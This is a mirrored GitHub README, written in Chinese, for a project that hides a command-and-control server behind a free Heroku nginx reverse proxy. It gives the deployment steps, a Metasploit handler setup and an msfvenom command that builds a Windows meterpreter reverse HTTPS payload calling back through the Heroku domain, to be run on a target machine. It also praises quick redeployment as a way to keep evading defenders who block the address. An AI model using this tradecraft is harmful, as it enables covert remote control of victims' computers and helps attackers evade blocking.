Code Monkey home page Code Monkey logo

nginx-proxy-heroku's Introduction

利用heroku隐藏C2服务器

Heroku是一个支持多种编程语言的云平台即服务。简单理解就是可以免费部署docker容器并且可以开放web服务到互联网.下面介绍操作步骤.

  • 首先注册Heroku账号,点击通过 https://dashboard.heroku.com 注册一个账号 (推荐使用gmail)
  • 注册成功以后登录,登录以后点击 部署链接,
  • app名称填写为 mydiydomain (可自定义,名称为后续域名前缀),TARGET环境变量填写为C2的handler地址

image.png

  • 然后点击 Deploy app 系统会自动部署.
  • 在metasploit-framework中添加handler,配置如图

image.pngimage.png

  • 执行 to_handler 生成listener
  • 使用如下命令生成payload
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=mydiydomain.herokuapp.com LPORT=443 -f exe -o ~/payload.exe
  • 上传运行目标机器运行即可

运行效果

  • 在metasploit-framework中查看session如下,可以看到session的链接地址为heroku中转服务器地址

image.png

  • 在目标机抓包效果如下

image.png image.png image.png

总结

heroku隐藏C2从技术原理上看非常简单,使用heroku服务部署nginx反向代理服务,payload连接heroku的nginx,nginx将流量转发到C2.具体优势如下:

  • 只需要注册heroku免费账号即可
  • 无需注册或购买域名
  • 自带可信的SSL证书(heroku域名自带证书)
  • 如果IP地址被封锁,可删除原有heroku app重新部署heroku app(大约需要30s),与防守人员持续对抗
  • 操作步骤简单

nginx-proxy-heroku's People

Contributors

funnywolf avatar

Watchers

avatar

Forkers

chengxxxx

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.